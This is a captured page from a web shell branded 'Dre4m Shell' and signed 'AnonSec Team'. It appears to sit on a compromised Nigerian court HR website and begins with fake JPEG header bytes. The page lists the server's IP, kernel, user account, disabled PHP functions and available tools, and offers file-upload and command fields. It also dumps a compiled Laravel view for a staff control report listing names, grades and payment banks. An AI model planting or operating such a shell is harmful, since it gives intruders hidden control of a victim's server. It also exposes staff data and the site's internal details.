ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.12.152.151
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/d39e988ff7de8a8daab506a2de6672a5e10f6fc6.php
<?php $__env->startSection('pageTitle'); ?>
    CONTROL REPORT
<?php $__env->stopSection(); ?>

<style type="text/css">
    .form-control {
        font-size: 13px;

    }

    .col-md-12 {
        padding: 0px 5px;
    }

    .table tr td {
        font-size: 13px;
        padding: 13px;
        font-family: Verdana, Geneva, sans-serif;
    }

    .table tr th {
        padding: 15px;
        font-size: 13px;
        text-transform: uppercase;
        font-family: Verdana, Geneva, sans-serif;
        color: #262626;
        background: #eee;
    }

    .input-lg {
        padding: 5px !important;
    }
</style>

<?php $__env->startSection('content'); ?>


    <div class="box box-default" style="border-top: none;">
        <form action="<?php echo e(url('/manpower/view/central')); ?>" method="post">
            <?php echo e(csrf_field()); ?>

            <div class="box-header with-border hidden-print">
                <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
                <span class="pull-right" style="margin-right: 30px;">
                    <div style="float: left;">
                        <div class="wrap">

                        </div>
                    </div>
                </span>
        </form>

        <span class="hidden-print">

            </form>
    </div>

    <div style="margin: 10px 20px;">
        <div align="center">
            <?php echo $__env->make('layouts._companyInfoPartial', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
        </div>

        <br />
        <?php if(session('err')): ?>
            <div class="col-sm-12 alert alert-warning alert-dismissible hidden-print" role="alert">
                <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                        aria-hidden="true">&times;</span>
                </button>
                <strong>Error!</strong>
                <?php echo e(session('err')); ?>

            </div>
        <?php endif; ?>

    </div>

    <div class="box-body">
        <div></div>
        <form method="post" action="<?php echo e(url('/control-reports')); ?>" class="hidden-print">
            <?php echo e(csrf_field()); ?>

            <div class="row" style="padding: 1px 12px; margin-bottom: 20px;">
                <div class="col-md-12" style="background: #eee; padding: 10px 15px">

                    
                    <div class="col-md-2"></div>
                    <?php if($CourtInfo->divisionstatus == 1 && Auth::user()->is_global == 1): ?>
                        <div class="col-md-3" style="font-size: 13px;">
                            <div class="form-group">
                                <label>Division</label>
                                <select name="division" id="division" class="form-control input-lg"
                                    style="font-size: 13px;" required>
                                    <option value="">Select Division</option>
                                    <?php $__currentLoopData = $division; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $d): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <?php if(session('_division') && session('_division') == $d->divisionID): ?>
                                            <option value="<?php echo e($d->divisionID); ?>" selected><?php echo e($d->division); ?></option>
                                        <?php else: ?>
                                            <option value="<?php echo e($d->divisionID); ?>"><?php echo e($d->division); ?></option>
                                        <?php endif; ?>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                </select>
                            </div>
                        </div>
                    <?php else: ?>
                        <div class="col-md-3" style="font-size: 13px;">
                            <div class="form-group">
                                <label>Division</label>
                                <input type="text" readonly class="form-control input-lg"
                                    value="<?php echo e($loggedDivision->division); ?>">
                            </div>
                        </div>
                        <input type="hidden" id="divison" name="division" value="<?php echo e($loggedDivision->divisionID); ?>">
                    <?php endif; ?>

                    <div class="col-md-3" style="padding: 1px;font-size: 13px;">
                        <div class="form-group">
                            <label>Year</label>
                            <select name="year" class="form-control input-lg" required>
                                <option value=""></option>
                                <?php for($i = 2017; $i <= date('Y'); $i++): ?>
                                    <?php if(session('_year') && session('_year') == $i): ?>
                                        <option value="<?php echo e($i); ?>" selected><?php echo e($i); ?></option>
                                    <?php else: ?>
                                        <option value="<?php echo e($i); ?>"><?php echo e($i); ?></option>
                                    <?php endif; ?>
                                <?php endfor; ?>
                            </select>

                        </div>
                    </div>

                    <div class="col-md-2" style="padding: 1px;">
                        <div class="form-group" style="padding-top: 23px;">

                            <input type="submit" name="submit" id="fileNo" class="btn btn-default input-lg"
                                value="Display" />
                        </div>
                    </div>

                    <div class="col-md-2"></div>

                </div>
                <?php if(isset($staffs) && count($staffs) == 0): ?>
                    <div align="center" style="color: red">No Staff found under that division</div>
                <?php endif; ?>
            </div>
        </form>

        <div class="row">
            <?php echo e(csrf_field()); ?>


            <div class="col-md-12">
                <table class="table table-striped table-condensed table-bordered table-responsive">
                    <thead>
                        <tr>
                            <th>S/N</th>
                            <th width="250" class="">STAFF NO</th>
                            <th>CONTROL NO.</th>
                            <th>STAFF NAME</th>
                            <th>DESIGNATION</th>
                            <th>GRADE</th>
                            <th>DATE OF APPOINTMENT</th>
                            <th>PAYMENT BANK</th>
                        </tr>
                    </thead>
                    <tbody>
                        <?php $key = 1; ?>
                        <?php if(isset($staffs) && count($staffs) != 0): ?>
                            <h3 align="center" style="color: green">DIVISION: <span
                                    id="diviName"><?php echo e($searchedDiviInfo->division); ?></span></h3>
                            <?php $__currentLoopData = $staffs; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $s): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <tr>
                                    
                                    <td><?php echo e($key++); ?></td>
                                    <td><?php echo e($s->fileNo); ?></td>
                                    <td><?php echo e($s->control_no); ?></td>
                                    <td><?php echo e($s->surname); ?> <?php echo e($s->first_name); ?> <?php echo e($s->othernames); ?></td>
                                    <td><?php echo e($s->designation ? $s->designation : 'Not Stated'); ?></td>
                                    <td><?php echo e($s->grade); ?></td>
                                    <td><?php echo e($s->appointment_date); ?></td>
                                    <td><?php echo e($s->bank); ?></td>
                                </tr>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        <?php endif; ?>
                    </tbody>
                </table>


            </div>
        </div>
        <!-- /.col
                    </div><!-- /.row -->
    </div>





<?php $__env->stopSection(); ?>
<?php $__env->startSection('scripts'); ?>
    <script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>
    <!-- autocomplete js-->
    <script src="<?php echo e(asset('assets/js/jquery.autocomplete.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/my-hr.js')); ?>" type="text/javascript"></script>


<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
    <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/custom-style.css')); ?>">

    <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/controlReport/reports.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team